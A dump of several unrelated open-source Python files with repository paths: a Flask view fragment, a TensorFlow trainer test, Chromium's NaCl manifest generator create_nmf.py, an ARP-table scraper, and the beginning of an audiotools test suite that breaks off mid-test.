logger.debug("user id:" + str(my_user.key) + " special " + issue_title + " not found")
return jsonify(content=issue_title + " not found")
| aaleotti-unimore/ComicsScraper | views/user_specials.py | Python | apache-2.0 | 2,561 |
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for object_detection.trainer."""
import tensorflow as tf
from google.protobuf import text_format
from object_detection import trainer
from object_detection.core import losses
from object_detection.core import model
from object_detection.core import standard_fields as fields
from object_detection.protos import train_pb2
NUMBER_OF_CLASSES = 2
def get_input_function():
"""A function to get test inputs. Returns an image with one box."""
image = tf.random_uniform([32, 32, 3], dtype=tf.float32)
class_label = tf.random_uniform(
[1], minval=0, maxval=NUMBER_OF_CLASSES, dtype=tf.int32)
box_label = tf.random_uniform(
[1, 4], minval=0.4, maxval=0.6, dtype=tf.float32)
return {
fields.InputDataFields.image: image,
fields.InputDataFields.groundtruth_classes: class_label,
fields.InputDataFields.groundtruth_boxes: box_label
}
class FakeDetectionModel(model.DetectionModel):
"""A simple (and poor) DetectionModel for use in test."""
def __init__(self):
super(FakeDetectionModel, self).__init__(num_classes=NUMBER_OF_CLASSES)
self._classification_loss = losses.WeightedSigmoidClassificationLoss(
anchorwise_output=True)
self._localization_loss = losses.WeightedSmoothL1LocalizationLoss(
anchorwise_output=True)
def preprocess(self, inputs):
"""Input preprocessing, resizes images to 28x28.
Args:
inputs: a [batch, height_in, width_in, channels] float32 tensor
representing a batch of images with values between 0 and 255.0.
Returns:
preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
"""
return tf.image.resize_images(inputs, [28, 28])
def predict(self, preprocessed_inputs):
"""Prediction tensors from inputs tensor.
Args:
preprocessed_inputs: a [batch, 28, 28, channels] float32 tensor.
Returns:
prediction_dict: a dictionary holding prediction tensors to be
passed to the Loss or Postprocess functions.
"""
flattened_inputs = tf.contrib.layers.flatten(preprocessed_inputs)
class_prediction = tf.contrib.layers.fully_connected(
flattened_inputs, self._num_classes)
box_prediction = tf.contrib.layers.fully_connected(flattened_inputs, 4)
return {
'class_predictions_with_background': tf.reshape(
class_prediction, [-1, 1, self._num_classes]),
'box_encodings': tf.reshape(box_prediction, [-1, 1, 4])
}
def postprocess(self, prediction_dict, **params):
"""Convert predicted output tensors to final detections. Unused.
Args:
prediction_dict: a dictionary holding prediction tensors.
**params: Additional keyword arguments for specific implementations of
DetectionModel.
Returns:
detections: a dictionary with empty fields.
"""
return {
'detection_boxes': None,
'detection_scores': None,
'detection_classes': None,
'num_detections': None
}
def loss(self, prediction_dict):
"""Compute scalar loss tensors with respect to provided groundtruth.
Calling this function requires that groundtruth tensors have been
provided via the provide_groundtruth function.
Args:
prediction_dict: a dictionary holding predicted tensors
Returns:
a dictionary mapping strings (loss names) to scalar tensors representing
loss values.
"""
batch_reg_targets = tf.stack(
self.groundtruth_lists(fields.BoxListFields.boxes))
batch_cls_targets = tf.stack(
self.groundtruth_lists(fields.BoxListFields.classes))
weights = tf.constant(
1.0, dtype=tf.float32,
shape=[len(self.groundtruth_lists(fields.BoxListFields.boxes)), 1])
location_losses = self._localization_loss(
prediction_dict['box_encodings'], batch_reg_targets,
weights=weights)
cls_losses = self._classification_loss(
prediction_dict['class_predictions_with_background'], batch_cls_targets,
weights=weights)
loss_dict = {
'localization_loss': tf.reduce_sum(location_losses),
'classification_loss': tf.reduce_sum(cls_losses),
}
return loss_dict
def restore_fn(self, checkpoint_path, from_detection_checkpoint=True):
"""Return callable for loading a checkpoint into the tensorflow graph.
Args:
checkpoint_path: path to checkpoint to restore.
from_detection_checkpoint: whether to restore from a full detection
checkpoint (with compatible variable names) or to restore from a
classification checkpoint for initialization prior to training.
Returns:
a callable which takes a tf.Session and does nothing.
"""
def restore(unused_sess):
return
return restore
class TrainerTest(tf.test.TestCase):
def test_configure_trainer_and_train_two_steps(self):
train_config_text_proto = """
optimizer {
adam_optimizer {
learning_rate {
constant_learning_rate {
learning_rate: 0.01
}
}
}
}
data_augmentation_options {
random_adjust_brightness {
max_delta: 0.2
}
}
data_augmentation_options {
random_adjust_contrast {
min_delta: 0.7
max_delta: 1.1
}
}
num_steps: 2
"""
train_config = train_pb2.TrainConfig()
text_format.Merge(train_config_text_proto, train_config)
train_dir = self.get_temp_dir()
trainer.train(create_tensor_dict_fn=get_input_function,
create_model_fn=FakeDetectionModel,
train_config=train_config,
master='',
task=0,
num_clones=1,
worker_replicas=1,
clone_on_cpu=True,
ps_tasks=0,
worker_job_name='worker',
is_chief=True,
train_dir=train_dir)
if __name__ == '__main__':
tf.test.main()
| unnikrishnankgs/va | venv/lib/python3.5/site-packages/tensorflow/models/object_detection/trainer_test.py | Python | bsd-2-clause | 6,635 |
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tool for automatically creating .nmf files from .nexe/.pexe executables.
As well as creating the nmf file this tool can also find and stage
any shared libraries dependancies that the executables might have.
"""
import errno
import json
import optparse
import os
import re
import shutil
import struct
import subprocess
import sys
import getos
import quote
if sys.version_info < (2, 6, 0):
sys.stderr.write("python 2.6 or later is required run this script\n")
sys.exit(1)
NeededMatcher = re.compile('^ *NEEDED *([^ ]+)\n$')
FormatMatcher = re.compile('^(.+):\\s*file format (.+)\n$')
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
OBJDUMP_ARCH_MAP = {
# Names returned by Linux's objdump:
'elf64-x86-64': 'x86-64',
'elf32-i386': 'x86-32',
'elf32-little': 'arm',
'elf32-littlearm': 'arm',
# Names returned by old x86_64-nacl-objdump:
'elf64-nacl': 'x86-64',
'elf32-nacl': 'x86-32',
# Names returned by new x86_64-nacl-objdump:
'elf64-x86-64-nacl': 'x86-64',
'elf32-x86-64-nacl': 'x86-64',
'elf32-i386-nacl': 'x86-32',
}
ARCH_LOCATION = {
'x86-32': 'lib32',
'x86-64': 'lib64',
'arm': 'lib',
}
# These constants are used within nmf files.
RUNNABLE_LD = 'runnable-ld.so' # Name of the dynamic loader
MAIN_NEXE = 'main.nexe' # Name of entry point for execution
PROGRAM_KEY = 'program' # Key of the program section in an nmf file
URL_KEY = 'url' # Key of the url field for a particular file in an nmf file
FILES_KEY = 'files' # Key of the files section in an nmf file
PNACL_OPTLEVEL_KEY = 'optlevel' # key for PNaCl optimization level
PORTABLE_KEY = 'portable' # key for portable section of manifest
TRANSLATE_KEY = 'pnacl-translate' # key for translatable objects
# The proper name of the dynamic linker, as kept in the IRT. This is
# excluded from the nmf file by convention.
LD_NACL_MAP = {
'x86-32': 'ld-nacl-x86-32.so.1',
'x86-64': 'ld-nacl-x86-64.so.1',
'arm': None,
}
def DebugPrint(message):
if DebugPrint.debug_mode:
sys.stderr.write('%s\n' % message)
DebugPrint.debug_mode = False # Set to True to enable extra debug prints
def MakeDir(dirname):
"""Just like os.makedirs but doesn't generate errors when dirname
already exists.
"""
if os.path.isdir(dirname):
return
Trace("mkdir: %s" % dirname)
try:
os.makedirs(dirname)
except OSError as exception_info:
if exception_info.errno != errno.EEXIST:
raise
class Error(Exception):
'''Local Error class for this file.'''
pass
def ParseElfHeader(path):
"""Determine properties of a nexe by parsing elf header.
Return tuple of architecture and boolean signalling whether
the executable is dynamic (has INTERP header) or static.
"""
# From elf.h:
# typedef struct
# {
# unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */
# Elf64_Half e_type; /* Object file type */
# Elf64_Half e_machine; /* Architecture */
# ...
# } Elf32_Ehdr;
elf_header_format = '16s2H'
elf_header_size = struct.calcsize(elf_header_format)
with open(path, 'rb') as f:
header = f.read(elf_header_size)
try:
header = struct.unpack(elf_header_format, header)
except struct.error:
raise Error("error parsing elf header: %s" % path)
e_ident, _, e_machine = header[:3]
elf_magic = '\x7fELF'
if e_ident[:4] != elf_magic:
raise Error('Not a valid NaCl executable: %s' % path)
e_machine_mapping = {
3 : 'x86-32',
40 : 'arm',
62 : 'x86-64'
}
if e_machine not in e_machine_mapping:
raise Error('Unknown machine type: %s' % e_machine)
# Set arch based on the machine type in the elf header
arch = e_machine_mapping[e_machine]
# Now read the full header in either 64bit or 32bit mode
dynamic = IsDynamicElf(path, arch == 'x86-64')
return arch, dynamic
def IsDynamicElf(path, is64bit):
"""Examine an elf file to determine if it is dynamically
linked or not.
This is determined by searching the program headers for
a header of type PT_INTERP.
"""
if is64bit:
elf_header_format = '16s2HI3QI3H'
else:
elf_header_format = '16s2HI3II3H'
elf_header_size = struct.calcsize(elf_header_format)
with open(path, 'rb') as f:
header = f.read(elf_header_size)
header = struct.unpack(elf_header_format, header)
p_header_offset = header[5]
p_header_entry_size = header[9]
num_p_header = header[10]
f.seek(p_header_offset)
p_headers = f.read(p_header_entry_size*num_p_header)
# Read the first word of each Phdr to find out its type.
#
# typedef struct
# {
# Elf32_Word p_type; /* Segment type */
# ...
# } Elf32_Phdr;
elf_phdr_format = 'I'
PT_INTERP = 3
while p_headers:
p_header = p_headers[:p_header_entry_size]
p_headers = p_headers[p_header_entry_size:]
phdr_type = struct.unpack(elf_phdr_format, p_header[:4])[0]
if phdr_type == PT_INTERP:
return True
return False
class ArchFile(object):
'''Simple structure containing information about
Attributes:
name: Name of this file
path: Full path to this file on the build system
arch: Architecture of this file (e.g., x86-32)
url: Relative path to file in the staged web directory.
Used for specifying the "url" attribute in the nmf file.'''
def __init__(self, name, path, url, arch=None):
self.name = name
self.path = path
self.url = url
self.arch = arch
if not arch:
self.arch = ParseElfHeader(path)[0]
def __repr__(self):
return '<ArchFile %s>' % self.path
def __str__(self):
'''Return the file path when invoked with the str() function'''
return self.path
class NmfUtils(object):
'''Helper class for creating and managing nmf files
Attributes:
manifest: A JSON-structured dict containing the nmf structure
needed: A dict with key=filename and value=ArchFile (see GetNeeded)
'''
def __init__(self, main_files=None, objdump=None,
lib_path=None, extra_files=None, lib_prefix=None,
remap=None, pnacl_optlevel=None):
'''Constructor
Args:
main_files: List of main entry program files. These will be named
files->main.nexe for dynamic nexes, and program for static nexes
objdump: path to x86_64-nacl-objdump tool (or Linux equivalent)
lib_path: List of paths to library directories
extra_files: List of extra files to include in the nmf
lib_prefix: A list of path components to prepend to the library paths,
both for staging the libraries and for inclusion into the nmf file.
Examples: ['..'], ['lib_dir']
remap: Remaps the library name in the manifest.
pnacl_optlevel: Optimization level for PNaCl translation.
'''
self.objdump = objdump
self.main_files = main_files or []
self.extra_files = extra_files or []
self.lib_path = lib_path or []
self.manifest = None
self.needed = {}
self.lib_prefix = lib_prefix or []
self.remap = remap or {}
self.pnacl = main_files and main_files[0].endswith('pexe')
self.pnacl_optlevel = pnacl_optlevel
for filename in self.main_files:
if not os.path.exists(filename):
raise Error('Input file not found: %s' % filename)
if not os.path.isfile(filename):
raise Error('Input is not a file: %s' % filename)
def GleanFromObjdump(self, files, arch):
'''Get architecture and dependency information for given files
Args:
files: A list of files to examine.
[ '/path/to/my.nexe',
'/path/to/lib64/libmy.so',
'/path/to/mydata.so',
'/path/to/my.data' ]
arch: The architecure we are looking for, or None to accept any
architecture.
Returns: A tuple with the following members:
input_info: A dict with key=filename and value=ArchFile of input files.
Includes the input files as well, with arch filled in if absent.
Example: { '/path/to/my.nexe': ArchFile(my.nexe),
'/path/to/libfoo.so': ArchFile(libfoo.so) }
needed: A set of strings formatted as "arch/name". Example:
set(['x86-32/libc.so', 'x86-64/libgcc.so'])
'''
if not self.objdump:
self.objdump = FindObjdumpExecutable()
if not self.objdump:
raise Error('No objdump executable found (see --help for more info)')
full_paths = set()
for filename in files:
if os.path.exists(filename):
full_paths.add(filename)
else:
for path in self.FindLibsInPath(filename):
full_paths.add(path)
cmd = [self.objdump, '-p'] + list(full_paths)
DebugPrint('GleanFromObjdump[%s](%s)' % (arch, cmd))
env = {'LANG': 'en_US.UTF-8'}
proc = subprocess.Popen(cmd, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, bufsize=-1,
env=env)
input_info = {}
found_basenames = set()
needed = set()
output, err_output = proc.communicate()
if proc.returncode:
raise Error('%s\nStdError=%s\nobjdump failed with error code: %d' %
(output, err_output, proc.returncode))
file_arch = None
for line in output.splitlines(True):
# Objdump should display the architecture first and then the dependencies
# second for each file in the list.
matched = FormatMatcher.match(line)
if matched:
filename = matched.group(1)
file_arch = OBJDUMP_ARCH_MAP[matched.group(2)]
if arch and file_arch != arch:
continue
name = os.path.basename(filename)
found_basenames.add(name)
input_info[filename] = ArchFile(
arch=file_arch,
name=name,
path=filename,
url='/'.join(self.lib_prefix + [ARCH_LOCATION[file_arch], name]))
matched = NeededMatcher.match(line)
if matched:
assert file_arch is not None
match = '/'.join([file_arch, matched.group(1)])
needed.add(match)
Trace("NEEDED: %s" % match)
for filename in files:
if os.path.basename(filename) not in found_basenames:
raise Error('Library not found [%s]: %s' % (arch, filename))
return input_info, needed
def FindLibsInPath(self, name):
'''Finds the set of libraries matching |name| within lib_path
Args:
name: name of library to find
Returns:
A list of system paths that match the given name within the lib_path'''
files = []
for dirname in self.lib_path:
filename = os.path.join(dirname, name)
if os.path.exists(filename):
files.append(filename)
if not files:
raise Error('cannot find library %s' % name)
return files
def GetNeeded(self):
'''Collect the list of dependencies for the main_files
Returns:
A dict with key=filename and value=ArchFile of input files.
Includes the input files as well, with arch filled in if absent.
Example: { '/path/to/my.nexe': ArchFile(my.nexe),
'/path/to/libfoo.so': ArchFile(libfoo.so) }'''
if self.needed:
return self.needed
DebugPrint('GetNeeded(%s)' % self.main_files)
dynamic = any(ParseElfHeader(f)[1] for f in self.main_files)
if dynamic:
examined = set()
all_files, unexamined = self.GleanFromObjdump(self.main_files, None)
for arch_file in all_files.itervalues():
arch_file.url = arch_file.path
if unexamined:
unexamined.add('/'.join([arch_file.arch, RUNNABLE_LD]))
while unexamined:
files_to_examine = {}
# Take all the currently unexamined files and group them
# by architecture.
for arch_name in unexamined:
arch, name = arch_name.split('/')
files_to_examine.setdefault(arch, []).append(name)
# Call GleanFromObjdump() for each architecture.
needed = set()
for arch, files in files_to_examine.iteritems():
new_files, new_needed = self.GleanFromObjdump(files, arch)
all_files.update(new_files)
needed |= new_needed
examined |= unexamined
unexamined = needed - examined
# With the runnable-ld.so scheme we have today, the proper name of
# the dynamic linker should be excluded from the list of files.
ldso = [LD_NACL_MAP[arch] for arch in set(OBJDUMP_ARCH_MAP.values())]
for name, arch_file in all_files.items():
if arch_file.name in ldso:
del all_files[name]
self.needed = all_files
else:
for filename in self.main_files:
url = os.path.split(filename)[1]
archfile = ArchFile(name=os.path.basename(filename),
path=filename, url=url)
self.needed[filename] = archfile
return self.needed
def StageDependencies(self, destination_dir):
'''Copies over the dependencies into a given destination directory
Each library will be put into a subdirectory that corresponds to the arch.
Args:
destination_dir: The destination directory for staging the dependencies
'''
nexe_root = os.path.dirname(os.path.abspath(self.main_files[0]))
nexe_root = os.path.normcase(nexe_root)
needed = self.GetNeeded()
for arch_file in needed.itervalues():
urldest = arch_file.url
source = arch_file.path
# for .nexe and .so files specified on the command line stage
# them in paths relative to the .nexe (with the .nexe always
# being staged at the root).
if source in self.main_files:
absdest = os.path.normcase(os.path.abspath(urldest))
if absdest.startswith(nexe_root):
urldest = os.path.relpath(urldest, nexe_root)
destination = os.path.join(destination_dir, urldest)
if (os.path.normcase(os.path.abspath(source)) ==
os.path.normcase(os.path.abspath(destination))):
continue
# make sure target dir exists
MakeDir(os.path.dirname(destination))
Trace('copy: %s -> %s' % (source, destination))
shutil.copy2(source, destination)
def _GeneratePNaClManifest(self):
manifest = {}
manifest[PROGRAM_KEY] = {}
manifest[PROGRAM_KEY][PORTABLE_KEY] = {}
translate_dict = {
"url": os.path.basename(self.main_files[0]),
}
if self.pnacl_optlevel is not None:
translate_dict[PNACL_OPTLEVEL_KEY] = self.pnacl_optlevel
manifest[PROGRAM_KEY][PORTABLE_KEY][TRANSLATE_KEY] = translate_dict
self.manifest = manifest
def _GenerateManifest(self):
'''Create a JSON formatted dict containing the files
NaCl will map url requests based on architecture. The startup NEXE
can always be found under the top key PROGRAM. Additional files are under
the FILES key further mapped by file name. In the case of 'runnable' the
PROGRAM key is populated with urls pointing the runnable-ld.so which acts
as the startup nexe. The application itself is then placed under the
FILES key mapped as 'main.exe' instead of the original name so that the
loader can find it. '''
manifest = { FILES_KEY: {}, PROGRAM_KEY: {} }
needed = self.GetNeeded()
runnable = any(n.endswith(RUNNABLE_LD) for n in needed)
extra_files_kv = [(key, ArchFile(name=key,
arch=arch,
path=url,
url=url))
for key, arch, url in self.extra_files]
nexe_root = os.path.dirname(os.path.abspath(self.main_files[0]))
for need, archinfo in needed.items() + extra_files_kv:
urlinfo = { URL_KEY: archinfo.url }
name = archinfo.name
# If starting with runnable-ld.so, make that the main executable.
if runnable:
if need.endswith(RUNNABLE_LD):
manifest[PROGRAM_KEY][archinfo.arch] = urlinfo
continue
if need in self.main_files:
# Ensure that the .nexe and .so names are relative to the root
# of where the .nexe lives.
if os.path.abspath(urlinfo[URL_KEY]).startswith(nexe_root):
urlinfo[URL_KEY] = os.path.relpath(urlinfo[URL_KEY], nexe_root)
if need.endswith(".nexe"):
# Place it under program if we aren't using the runnable-ld.so.
if not runnable:
manifest[PROGRAM_KEY][archinfo.arch] = urlinfo
continue
# Otherwise, treat it like another another file named main.nexe.
name = MAIN_NEXE
name = self.remap.get(name, name)
fileinfo = manifest[FILES_KEY].get(name, {})
fileinfo[archinfo.arch] = urlinfo
manifest[FILES_KEY][name] = fileinfo
self.manifest = manifest
def GetManifest(self):
'''Returns a JSON-formatted dict containing the NaCl dependencies'''
if not self.manifest:
if self.pnacl:
self._GeneratePNaClManifest()
else:
self._GenerateManifest()
return self.manifest
def GetJson(self):
'''Returns the Manifest as a JSON-formatted string'''
pretty_string = json.dumps(self.GetManifest(), indent=2)
# json.dumps sometimes returns trailing whitespace and does not put
# a newline at the end. This code fixes these problems.
pretty_lines = pretty_string.split('\n')
return '\n'.join([line.rstrip() for line in pretty_lines]) + '\n'
def Trace(msg):
if Trace.verbose:
sys.stderr.write(str(msg) + '\n')
Trace.verbose = False
def ParseExtraFiles(encoded_list, err):
"""Parse the extra-files list and return a canonicalized list of
[key, arch, url] triples. The |encoded_list| should be a list of
strings of the form 'key:url' or 'key:arch:url', where an omitted
'arch' is taken to mean 'portable'.
All entries in |encoded_list| are checked for syntax errors before
returning. Error messages are written to |err| (typically
sys.stderr) so that the user has actionable feedback for fixing all
errors, rather than one at a time. If there are any errors, None is
returned instead of a list, since an empty list is a valid return
value.
"""
seen_error = False
canonicalized = []
for ix in range(len(encoded_list)):
kv = encoded_list[ix]
unquoted = quote.unquote(kv, ':')
if len(unquoted) == 3:
if unquoted[1] != ':':
err.write('Syntax error for key:value tuple ' +
'for --extra-files argument: ' + kv + '\n')
seen_error = True
else:
canonicalized.append([unquoted[0], 'portable', unquoted[2]])
elif len(unquoted) == 5:
if unquoted[1] != ':' or unquoted[3] != ':':
err.write('Syntax error for key:arch:url tuple ' +
'for --extra-files argument: ' +
kv + '\n')
seen_error = True
else:
canonicalized.append([unquoted[0], unquoted[2], unquoted[4]])
else:
err.write('Bad key:arch:url tuple for --extra-files: ' + kv + '\n')
if seen_error:
return None
return canonicalized
def GetSDKRoot():
"""Determine current NACL_SDK_ROOT, either via the environment variable
itself, or by attempting to derive it from the location of this script.
"""
sdk_root = os.environ.get('NACL_SDK_ROOT')
if not sdk_root:
sdk_root = os.path.dirname(SCRIPT_DIR)
if not os.path.exists(os.path.join(sdk_root, 'toolchain')):
return None
return sdk_root
def FindObjdumpExecutable():
"""Derive path to objdump executable to use for determining shared
object dependencies.
"""
sdk_root = GetSDKRoot()
if not sdk_root:
return None
osname = getos.GetPlatform()
toolchain = os.path.join(sdk_root, 'toolchain', '%s_x86_glibc' % osname)
objdump = os.path.join(toolchain, 'bin', 'x86_64-nacl-objdump')
if osname == 'win':
objdump += '.exe'
if not os.path.exists(objdump):
sys.stderr.write('WARNING: failed to find objdump in default '
'location: %s' % objdump)
return None
return objdump
def GetDefaultLibPath(config):
"""Derive default library path to use when searching for shared
objects. This currently include the toolchain library folders
as well as the top level SDK lib folder and the naclports lib
folder. We include both 32-bit and 64-bit library paths.
"""
assert(config in ('Debug', 'Release'))
sdk_root = GetSDKRoot()
if not sdk_root:
# TOOD(sbc): output a warning here? We would also need to suppress
# the warning when run from the chromium build.
return []
osname = getos.GetPlatform()
libpath = [
# Core toolchain libraries
'toolchain/%s_x86_glibc/x86_64-nacl/lib' % osname,
'toolchain/%s_x86_glibc/x86_64-nacl/lib32' % osname,
# naclports installed libraries
'toolchain/%s_x86_glibc/x86_64-nacl/usr/lib' % osname,
'toolchain/%s_x86_glibc/i686-nacl/usr/lib' % osname,
# SDK bundle libraries
'lib/glibc_x86_32/%s' % config,
'lib/glibc_x86_64/%s' % config,
# naclports bundle libraries
'ports/lib/glibc_x86_32/%s' % config,
'ports/lib/glibc_x86_64/%s' % config,
]
libpath = [os.path.normpath(p) for p in libpath]
libpath = [os.path.join(sdk_root, p) for p in libpath]
return libpath
def main(argv):
parser = optparse.OptionParser(
usage='Usage: %prog [options] nexe [extra_libs...]', description=__doc__)
parser.add_option('-o', '--output', dest='output',
help='Write manifest file to FILE (default is stdout)',
metavar='FILE')
parser.add_option('-D', '--objdump', dest='objdump',
help='Override the default "objdump" tool used to find '
'shared object dependencies',
metavar='TOOL')
parser.add_option('--no-default-libpath', action='store_true',
help="Don't include the SDK default library paths")
parser.add_option('--debug-libs', action='store_true',
help='Use debug library paths when constructing default '
'library path.')
parser.add_option('-L', '--library-path', dest='lib_path',
action='append', default=[],
help='Add DIRECTORY to library search path',
metavar='DIRECTORY')
parser.add_option('-P', '--path-prefix', dest='path_prefix', default='',
help='A path to prepend to shared libraries in the .nmf',
metavar='DIRECTORY')
parser.add_option('-s', '--stage-dependencies', dest='stage_dependencies',
help='Destination directory for staging libraries',
metavar='DIRECTORY')
parser.add_option('-t', '--toolchain', help='Legacy option, do not use')
parser.add_option('-n', '--name', dest='name',
help='Rename FOO as BAR',
action='append', default=[], metavar='FOO,BAR')
parser.add_option('-x', '--extra-files',
help=('Add extra key:file tuple to the "files"' +
' section of the .nmf'),
action='append', default=[], metavar='FILE')
parser.add_option('-O', '--pnacl-optlevel',
help='Set the optimization level to N in PNaCl manifests',
metavar='N')
parser.add_option('-v', '--verbose',
help='Verbose output', action='store_true')
parser.add_option('-d', '--debug-mode',
help='Debug mode', action='store_true')
# To enable bash completion for this command first install optcomplete
# and then add this line to your .bashrc:
# complete -F _optcomplete create_nmf.py
try:
import optcomplete
optcomplete.autocomplete(parser)
except ImportError:
pass
options, args = parser.parse_args(argv)
if options.verbose:
Trace.verbose = True
if options.debug_mode:
DebugPrint.debug_mode = True
if options.toolchain is not None:
sys.stderr.write('warning: option -t/--toolchain is deprecated.\n')
if len(args) < 1:
parser.error('No nexe files specified. See --help for more info')
canonicalized = ParseExtraFiles(options.extra_files, sys.stderr)
if canonicalized is None:
parser.error('Bad --extra-files (-x) argument syntax')
remap = {}
for ren in options.name:
parts = ren.split(',')
if len(parts) != 2:
parser.error('Expecting --name=<orig_arch.so>,<new_name.so>')
remap[parts[0]] = parts[1]
if options.path_prefix:
path_prefix = options.path_prefix.split('/')
else:
path_prefix = []
for libpath in options.lib_path:
if not os.path.exists(libpath):
sys.stderr.write('Specified library path does not exist: %s\n' % libpath)
elif not os.path.isdir(libpath):
sys.stderr.write('Specified library is not a directory: %s\n' % libpath)
if not options.no_default_libpath:
# Add default libraries paths to the end of the search path.
config = options.debug_libs and 'Debug' or 'Release'
options.lib_path += GetDefaultLibPath(config)
pnacl_optlevel = None
if options.pnacl_optlevel is not None:
pnacl_optlevel = int(options.pnacl_optlevel)
if pnacl_optlevel < 0 or pnacl_optlevel > 3:
sys.stderr.write(
'warning: PNaCl optlevel %d is unsupported (< 0 or > 3)\n' %
pnacl_optlevel)
nmf = NmfUtils(objdump=options.objdump,
main_files=args,
lib_path=options.lib_path,
extra_files=canonicalized,
lib_prefix=path_prefix,
remap=remap,
pnacl_optlevel=pnacl_optlevel)
nmf.GetManifest()
if not options.output:
sys.stdout.write(nmf.GetJson())
else:
with open(options.output, 'w') as output:
output.write(nmf.GetJson())
if options.stage_dependencies and not nmf.pnacl:
Trace('Staging dependencies...')
nmf.StageDependencies(options.stage_dependencies)
return 0
if __name__ == '__main__':
try:
rtn = main(sys.argv[1:])
except Error, e:
sys.stderr.write('%s: %s\n' % (os.path.basename(__file__), e))
rtn = 1
except KeyboardInterrupt:
sys.stderr.write('%s: interrupted\n' % os.path.basename(__file__))
rtn = 1
sys.exit(rtn)
| ChromiumWebApps/chromium | native_client_sdk/src/tools/create_nmf.py | Python | bsd-3-clause | 26,299 |
import re
import subprocess
class ArpScraper(object):
# this entire class is obviously full of peril and shame
# ... only tested on Ubuntu 14.04...
# A cursory search for python arp libraries returned immature
# libraries focused on crafting arp packets rather than querying
# known system data, so here we are.
ip_re = re.compile('[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}')
mac_re = re.compile('..:..:..:..:..:..')
def __init__(self):
pass
def ip_lookup(self, mac_addresses=[]):
arp_dict = self.parse_system_arp()
addresses = []
for mac in mac_addresses:
addresses.append((mac, arp_dict.get(mac, "")))
return addresses
def parse_system_arp(self):
arp_dict = {}
arp_out = subprocess.check_output(['arp', '-a'])
for line in arp_out.split('\n'):
try:
ip = self.ip_re.search(line).group(0)
mac = self.mac_re.search(line).group(0)
arp_dict[mac] = ip
except:
pass
return arp_dict
| timfreund/ceph-libvirt-clusterer | cephlvc/network.py | Python | mit | 1,099 |
#!/usr/bin/python
#Audio Tools, a module and set of tools for manipulating audio data
#Copyright (C) 2007-2012 Brian Langenberger
#This program is free software; you can redistribute it and/or modify
#it under the terms of the GNU General Public License as published by
#the Free Software Foundation; either version 2 of the License, or
#(at your option) any later version.
#This program is distributed in the hope that it will be useful,
#but WITHOUT ANY WARRANTY; without even the implied warranty of
#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
#GNU General Public License for more details.
#You should have received a copy of the GNU General Public License
#along with this program; if not, write to the Free Software
#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
import unittest
import audiotools
import tempfile
import os
import os.path
from hashlib import md5
import random
import decimal
import test_streams
import cStringIO
import subprocess
import struct
from test import (parser,
BLANK_PCM_Reader, RANDOM_PCM_Reader,
EXACT_BLANK_PCM_Reader, EXACT_SILENCE_PCM_Reader,
Variable_Reader,
EXACT_RANDOM_PCM_Reader, MD5_Reader,
Join_Reader, FrameCounter,
Combinations,
TEST_COVER1, TEST_COVER2, TEST_COVER3,
HUGE_BMP)
def do_nothing(self):
pass
#add a bunch of decorator metafunctions like LIB_CORE
#which can be wrapped around individual tests as needed
for section in parser.sections():
for option in parser.options(section):
if (parser.getboolean(section, option)):
vars()["%s_%s" % (section.upper(),
option.upper())] = lambda function: function
else:
vars()["%s_%s" % (section.upper(),
option.upper())] = lambda function: do_nothing
class ERROR_PCM_Reader(audiotools.PCMReader):
def __init__(self, error,
sample_rate=44100, channels=2, bits_per_sample=16,
channel_mask=None, failure_chance=.2, minimum_successes=0):
if (channel_mask is None):
channel_mask = audiotools.ChannelMask.from_channels(channels)
audiotools.PCMReader.__init__(
self,
file=None,
sample_rate=sample_rate,
channels=channels,
bits_per_sample=bits_per_sample,
channel_mask=channel_mask)
self.error = error
#this is so we can generate some "live" PCM data
#before erroring out due to our error
self.failure_chance = failure_chance
self.minimum_successes = minimum_successes
self.frame = audiotools.pcm.from_list([0] * self.channels,
self.channels,
self.bits_per_sample,
True)
def read(self, pcm_frames):
if (self.minimum_successes > 0):
self.minimum_successes -= 1
return audiotools.pcm.from_frames(
[self.frame for i in xrange(pcm_frames)])
else:
if (random.random() <= self.failure_chance):
raise self.error
else:
return audiotools.pcm.from_frames(
[self.frame for i in xrange(pcm_frames)])
def close(self):
pass
class Log:
def __init__(self):
self.results = []
def update(self, *args):
self.results.append(args)
class AudioFileTest(unittest.TestCase):
def setUp(self):
self.audio_class = audiotools.AudioFile
self.suffix = "." + self.audio_class.SUFFIX
@FORMAT_AUDIOFILE
def test_init(self):
if (self.audio_class is audiotools.AudioFile):
return
#first check nonexistent files
self.assertRaises(audiotools.InvalidFile,
self.audio_class,
"/dev/null/foo.%s" % (self.audio_class.SUFFIX))
f = tempfile.NamedTemporaryFile(suffix="." + self.audio_class.SUFFIX)
try:
#then check empty files
f.write("")
f.flush()
self.assertEqual(os.path.isfile(f.name), True)
self.assertRaises(audiotools.InvalidFile,
self.audio_class,
f.name)
#then check files with a bit of junk at the beginning
f.write("".join(map(chr,
[26, 83, 201, 240, 73, 178, 34, 67, 87, 214])))
f.flush()
self.assert_(os.path.getsize(f.name) > 0)
self.assertRaises(audiotools.InvalidFile,
self.audio_class,
f.name)
#finally, check unreadable files
original_stat = os.stat(f.name)[0]
try:
os.chmod(f.name, 0)
self.assertRaises(audiotools.InvalidFile,
self.audio_class,
f.name)
finally:
os.chmod(f.name, original_stat)
finally:
f.close()
@FORMAT_AUDIOFILE
def test_is_type(self):
if (self.audio_class is audiotools.AudioFile):
return
valid = tempfile.NamedTemporaryFile(suffix=self.suffix)
invalid = tempfile.NamedTemporaryFile(suffix=self.suffix)
try:
#generate a valid file and check audiotools.file_type
